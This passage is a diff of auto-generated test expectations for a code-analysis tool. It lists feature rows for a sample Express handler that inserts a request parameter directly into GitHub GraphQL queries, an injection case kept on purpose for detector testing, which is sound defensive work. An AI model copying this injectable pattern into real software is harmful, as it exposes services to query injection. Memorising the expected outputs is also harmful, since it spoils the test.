'/event/:id/' | calleeImports | express | @@ -348,6 +2169,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:9:54:21 | '/event/:id/' | contextSurroundingFunctionParameters | | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:9:54:21 | '/event/:id/' | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:9:54:21 | '/event/:id/' | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | kit2 | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | kit2 | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | kit2 | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | kit2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | kit2 | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | this | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | this | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | this | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | this | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:54:23 | this | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | 'arguments' object of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | async f ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | async f ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | async f ... OT OK\\n} | calleeImports | express | @@ -355,6 +2191,111 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | async f ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | async f ... OT OK\\n} | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | async f ... OT OK\\n} | receiverName | app | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | exceptional return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | exceptional return of anonymous function | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | exceptional return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | return of anonymous function | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | return of anonymous function | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:24:59:1 | return of anonymous function | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:39:54:41 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:44:54:46 | res | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:44:54:46 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:44:54:46 | res | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:44:54:46 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:54:44:54:46 | res | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:12 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:12 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:12 | id | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:12 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:12 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id = req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id = req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id = req.params.id | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id = req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:11:55:28 | id = req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:18 | req | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:18 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:18 | req | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:18 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:18 | req | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:25 | req.params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:25 | req.params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:25 | req.params | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:25 | req.params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:25 | req.params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:28 | req.params.id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:28 | req.params.id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:28 | req.params.id | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:28 | req.params.id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:16:55:28 | req.params.id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:20:55:25 | params | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:20:55:25 | params | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:20:55:25 | params | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:20:55:25 | params | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:20:55:25 | params | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:27:55:28 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:27:55:28 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:27:55:28 | id | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:27:55:28 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:55:27:55:28 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:16 | result | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:16 | result | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:16 | result | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:16 | result | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:16 | result | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:50 | result ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:50 | result ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:50 | result ... ${id}`) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:50 | result ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:11:56:50 | result ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:20:56:50 | await k ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:20:56:50 | await k ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:20:56:50 | await k ... ${id}`) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:20:56:50 | await k ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:20:56:50 | await k ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:29 | kit2 | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:29 | kit2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:29 | kit2 | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:29 | kit2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:29 | kit2 | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:37 | kit2.graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:37 | kit2.graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:37 | kit2.graphql | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:37 | kit2.graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:37 | kit2.graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | exceptional return of kit2.gr ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | exceptional return of kit2.gr ... ${id}`) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | exceptional return of kit2.gr ... ${id}`) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | exceptional return of kit2.gr ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | exceptional return of kit2.gr ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | kit2.gr ... ${id}`) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | kit2.gr ... ${id}`) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | kit2.gr ... ${id}`) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | kit2.gr ... ${id}`) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:26:56:50 | kit2.gr ... ${id}`) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:31:56:37 | graphql | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:31:56:37 | graphql | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:31:56:37 | graphql | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:31:56:37 | graphql | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:31:56:37 | graphql | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:39:56:49 | `foo ${id}` | CalleeFlexibleAccessPath | kit2.graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:39:56:49 | `foo ${id}` | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:39:56:49 | `foo ${id}` | calleeImports | @octokit/rest | @@ -364,6 +2305,58 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:39:56:49 | `foo ${id}` | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:39:56:49 | `foo ${id}` | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:39:56:49 | `foo ${id}` | receiverName | kit2 | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:40:56:43 | foo | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:40:56:43 | foo | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:40:56:43 | foo | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:40:56:43 | foo | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:40:56:43 | foo | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:40:56:43 | foo | stringConcatenatedWith | -endpoint- id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:46:56:47 | id | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:46:56:47 | id | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:46:56:47 | id | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:46:56:47 | id | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:46:56:47 | id | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:56:46:56:47 | id | stringConcatenatedWith | 'foo ' -endpoint- | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:17 | result2 | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:17 | result2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:17 | result2 | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:17 | result2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:17 | result2 | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:79 | result2 ... id}` }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:79 | result2 ... id}` }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:79 | result2 ... id}` }) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:79 | result2 ... id}` }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:11:58:79 | result2 ... id}` }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:21:58:79 | await k ... id}` }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:21:58:79 | await k ... id}` }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:21:58:79 | await k ... id}` }) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:21:58:79 | await k ... id}` }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:21:58:79 | await k ... id}` }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:30 | kit2 | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:30 | kit2 | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:30 | kit2 | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:30 | kit2 | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:30 | kit2 | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:38 | kit2.request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:38 | kit2.request | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:38 | kit2.request | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:38 | kit2.request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:38 | kit2.request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | exceptional return of kit2.re ... id}` }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | exceptional return of kit2.re ... id}` }) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | exceptional return of kit2.re ... id}` }) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | exceptional return of kit2.re ... id}` }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | exceptional return of kit2.re ... id}` }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | kit2.re ... id}` }) | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | kit2.re ... id}` }) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | kit2.re ... id}` }) | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | kit2.re ... id}` }) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:27:58:79 | kit2.re ... id}` }) | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:32:58:38 | request | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:32:58:38 | request | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:32:58:38 | request | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:32:58:38 | request | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:32:58:38 | request | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:40:58:54 | "POST /graphql" | CalleeFlexibleAccessPath | kit2.request | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:40:58:54 | "POST /graphql" | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:40:58:54 | "POST /graphql" | calleeImports | @octokit/rest | @@ -382,6 +2375,21 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:57:58:78 | { query ... {id}` } | enclosingFunctionName | app.get#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:57:58:78 | { query ... {id}` } | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | | autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:57:58:78 | { query ... {id}` } | receiverName | kit2 | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:63 | query | contextFunctionInterfaces | hello() | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:63 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:63 | query | enclosingFunctionBody | req res id req params id result kit2 graphql foo id result2 kit2 request POST /graphql query foo id | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:63 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:63 | query | fileImports | @actions/github @octokit/core @octokit/graphql @octokit/request @octokit/rest express graphql | +| autogenerated/NosqlAndSqlInjection/untyped/graphql.js:58:59:58:76 | query: `foo ${id}` | contextFunctionInterfaces | hello() | +| 